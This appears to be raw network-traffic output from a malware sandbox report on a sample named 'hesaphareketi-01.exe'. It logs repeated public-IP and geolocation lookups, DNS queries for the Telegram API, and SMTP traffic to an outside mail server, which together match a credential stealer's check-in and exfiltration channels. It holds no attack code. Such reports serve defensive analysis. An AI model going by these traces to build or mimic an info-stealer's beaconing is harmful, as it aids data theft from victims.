                                        Oct 3, 2024 09:11:51.580544949 CEST5874973477.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:51.580714941 CEST5874973477.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:51.580837011 CEST5874973477.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:51.580894947 CEST5874973477.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:51.580909014 CEST5874973477.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:52.146908045 CEST5874973477.245.159.27192.168.2.9
                                        Oct 3, 2024 09:11:52.197678089 CEST49734587192.168.2.977.245.159.27
                                        Oct 3, 2024 09:13:28.105871916 CEST49734587192.168.2.977.245.159.27
                                        Oct 3, 2024 09:13:28.111685991 CEST5874973477.245.159.27192.168.2.9
                                        Oct 3, 2024 09:13:28.340640068 CEST5874973477.245.159.27192.168.2.9
                                        Oct 3, 2024 09:13:28.340846062 CEST49734587192.168.2.977.245.159.27
                                        Oct 3, 2024 09:13:28.347320080 CEST5874973477.245.159.27192.168.2.9
                                        Oct 3, 2024 09:13:28.347476006 CEST49734587192.168.2.977.245.159.27
                                        TimestampSource PortDest PortSource IPDest IP
                                        Oct 3, 2024 09:11:19.604510069 CEST4959153192.168.2.91.1.1.1
                                        Oct 3, 2024 09:11:20.283349991 CEST53495911.1.1.1192.168.2.9
                                        Oct 3, 2024 09:11:21.200622082 CEST5572953192.168.2.91.1.1.1
                                        Oct 3, 2024 09:11:21.207983971 CEST53557291.1.1.1192.168.2.9
                                        Oct 3, 2024 09:11:36.045802116 CEST6471153192.168.2.91.1.1.1
                                        Oct 3, 2024 09:11:36.053600073 CEST53647111.1.1.1192.168.2.9
                                        Oct 3, 2024 09:11:43.473709106 CEST5644953192.168.2.91.1.1.1
                                        Oct 3, 2024 09:11:43.787724018 CEST53564491.1.1.1192.168.2.9
                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Oct 3, 2024 09:11:19.604510069 CEST192.168.2.91.1.1.10x29d5Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                        Oct 3, 2024 09:11:21.200622082 CEST192.168.2.91.1.1.10xe7b4Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                        Oct 3, 2024 09:11:36.045802116 CEST192.168.2.91.1.1.10x114Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                        Oct 3, 2024 09:11:43.473709106 CEST192.168.2.91.1.1.10x3caaStandard query (0)mail.obaambalaj.com.trA (IP address)IN (0x0001)false
                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Oct 3, 2024 09:11:20.283349991 CEST1.1.1.1192.168.2.90x29d5No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                        Oct 3, 2024 09:11:20.283349991 CEST1.1.1.1192.168.2.90x29d5No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                        Oct 3, 2024 09:11:20.283349991 CEST1.1.1.1192.168.2.90x29d5No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                        Oct 3, 2024 09:11:20.283349991 CEST1.1.1.1192.168.2.90x29d5No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                        Oct 3, 2024 09:11:20.283349991 CEST1.1.1.1192.168.2.90x29d5No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                        Oct 3, 2024 09:11:20.283349991 CEST1.1.1.1192.168.2.90x29d5No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                        Oct 3, 2024 09:11:21.207983971 CEST1.1.1.1192.168.2.90xe7b4No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                        Oct 3, 2024 09:11:21.207983971 CEST1.1.1.1192.168.2.90xe7b4No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                        Oct 3, 2024 09:11:36.053600073 CEST1.1.1.1192.168.2.90x114No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                        Oct 3, 2024 09:11:43.787724018 CEST1.1.1.1192.168.2.90x3caaNo error (0)mail.obaambalaj.com.tr77.245.159.27A (IP address)IN (0x0001)false
                                        • reallyfreegeoip.org
                                        • api.telegram.org
                                        • checkip.dyndns.org
                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.949708193.122.6.168805508C:\Users\user\Desktop\hesaphareketi-01.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 3, 2024 09:11:20.294878960 CEST151OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Connection: Keep-Alive
                                        Oct 3, 2024 09:11:20.929568052 CEST320INHTTP/1.1 200 OK
                                        Date: Thu, 03 Oct 2024 07:11:20 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        X-Request-ID: 1a6d90d78cad8eed407b9b5244c711a0
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                        Oct 3, 2024 09:11:20.937781096 CEST127OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Oct 3, 2024 09:11:21.125109911 CEST320INHTTP/1.1 200 OK
                                        Date: Thu, 03 Oct 2024 07:11:21 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        X-Request-ID: f44b0966175c22e790307cf29d9c6290
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                        Oct 3, 2024 09:11:22.393657923 CEST127OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Oct 3, 2024 09:11:22.656675100 CEST320INHTTP/1.1 200 OK
                                        Date: Thu, 03 Oct 2024 07:11:22 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        X-Request-ID: 8a03ee24789533583d99669b3bc3b9da
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.949712193.122.6.168805508C:\Users\user\Desktop\hesaphareketi-01.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 3, 2024 09:11:23.293189049 CEST127OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Oct 3, 2024 09:11:23.933223009 CEST320INHTTP/1.1 200 OK
                                        Date: Thu, 03 Oct 2024 07:11:23 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        X-Request-ID: e7ecd1eeb7815afdd1960a9b5de77692
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.949715193.122.6.168805508C:\Users\user\Desktop\hesaphareketi-01.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 3, 2024 09:11:24.728694916 CEST151OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Connection: Keep-Alive
                                        Oct 3, 2024 09:11:26.712038994 CEST320INHTTP/1.1 200 OK
                                        Date: Thu, 03 Oct 2024 07:11:25 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        X-Request-ID: 1d3c9f4ed60d11eba55ba362b55d4c39
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                        Oct 3, 2024 09:11:26.712404013 CEST320INHTTP/1.1 200 OK
                                        Date: Thu, 03 Oct 2024 07:11:25 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        X-Request-ID: 1d3c9f4ed60d11eba55ba362b55d4c39
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                        Oct 3, 2024 09:11:26.712444067 CEST320INHTTP/1.1 200 OK
                                        Date: Thu, 03 Oct 2024 07:11:25 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        X-Request-ID: 1d3c9f4ed60d11eba55ba362b55d4c39
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                        Oct 3, 2024 09:11:26.712949038 CEST320INHTTP/1.1 200 OK
                                        Date: Thu, 03 Oct 2024 07:11:25 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        X-Request-ID: 1d3c9f4ed60d11eba55ba362b55d4c39
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        3192.168.2.949717193.122.6.168805508C:\Users\user\Desktop\hesaphareketi-01.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 3, 2024 09:11:27.321232080 CEST151OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Connection: Keep-Alive
                                        Oct 3, 2024 09:11:27.945125103 CEST320INHTTP/1.1 200 OK
                                        Date: Thu, 03 Oct 2024 07:11:27 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        X-Request-ID: a24bb9ad77629c5cdf53554abc649447
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        4192.168.2.949719193.122.6.168805508C:\Users\user\Desktop\hesaphareketi-01.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 3, 2024 09:11:28.557998896 CEST151OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Connection: Keep-Alive
                                        Oct 3, 2024 09:11:29.784427881 CEST320INHTTP/1.1 200 OK
                                        Date: Thu, 03 Oct 2024 07:11:29 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        X-Request-ID: 5b7a0350b7b6d4dd12ff2aa64e7e6eca
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        5192.168.2.949721193.122.6.168805508C:\Users\user\Desktop\hesaphareketi-01.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 3, 2024 09:11:30.390239954 CEST151OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Connection: Keep-Alive
                                        Oct 3, 2024 09:11:31.019678116 CEST320INHTTP/1.1 200 OK
                                        Date: Thu, 03 Oct 2024 07:11:30 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        X-Request-ID: 8cfdbe6a9bfca9d4be3b993a2f398c74
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        6192.168.2.949723193.122.6.168805508C:\Users\user\Desktop\hesaphareketi-01.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 3, 2024 09:11:31.638338089 CEST151OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Connection: Keep-Alive
                                        Oct 3, 2024 09:11:32.939493895 CEST320INHTTP/1.1 200 OK
                                        Date: Thu, 03 Oct 2024 07:11:32 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        X-Request-ID: 8a2a0686a87a54485fb23f3234754934
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        7192.168.2.949730193.122.6.168805508C:\Users\user\Desktop\hesaphareketi-01.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 3, 2024 09:11:33.578594923 CEST151OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Connection: Keep-Alive
                                        Oct 3, 2024 09:11:35.391427040 CEST320INHTTP/1.1 200 OK
                                        Date: Thu, 03 Oct 2024 07:11:35 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        X-Request-ID: b48111256bcc95845b24f04884a82fdb
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.949709188.114.96.34435508C:\Users\user\Desktop\hesaphareketi-01.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-03 07:11:22 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        Connection: Keep-Alive
                                        2024-10-03 07:11:22 UTC704INHTTP/1.1 200 OK
                                        Date: Thu, 03 Oct 2024 07:11:22 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 63276
                                        Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lEskwx3Fiz61QkgEqJSVYdmN9DND8EVqQBFYGirsTziHF4tPTE7HmJik61O7RJwPHPXezXeF0N9CgW4BaCb2%2FDDmsfgl1IX%2FKKSKH29Q3Un4DCMVDwgqvCLa70uAeMLMwP4ctmuh"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8ccb1e233cd68cb1-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-10-03 07:11:22 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-10-03 07:11:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.949710188.114.96.34435508C:\Users\user\Desktop\hesaphareketi-01.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-03 07:11:23 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        2024-10-03 07:11:23 UTC686INHTTP/1.1 200 OK
                                        Date: Thu, 03 Oct 2024 07:11:23 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 63277
                                        Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WlQxDcqt%2Fx1HgoG8ctMuwq3L%2FIL1r%2FqYzvocfYDDxl%2FlzwYibNhR%2FPHRO7UVzZMtBNoa961ht7jKBLt4rs5I%2F3u2OXepzntvus2m4GZ%2Fj%2B4Bk9WLJiHAApSrvris6hQo310XvPDF"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8ccb1e2a2eab4363-EWR
                                        2024-10-03 07:11:23 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-10-03 07:11:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.949714188.114.96.34435508C:\Users\user\Desktop\hesaphareketi-01.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-03 07:11:24 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        Connection: Keep-Alive
                                        2024-10-03 07:11:24 UTC674INHTTP/1.1 200 OK
                                        Date: Thu, 03 Oct 2024 07:11:24 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 63278
                                        Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zh5e8Xb3dl9JghVhUxoveOKw0loshxfP4%2FYBaaXJbZpXDKssKXYPF8KWbXar8rSEmzTWOqwkFAS56c5%2Fo0CRcHPEnXo9Asf9GNuO7XTMD5OuQ3MAXeL6ifLkprTwnKTIrTS8UNX5"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8ccb1e331fe442d4-EWR
                                        2024-10-03 07:11:24 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-10-03 07:11:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
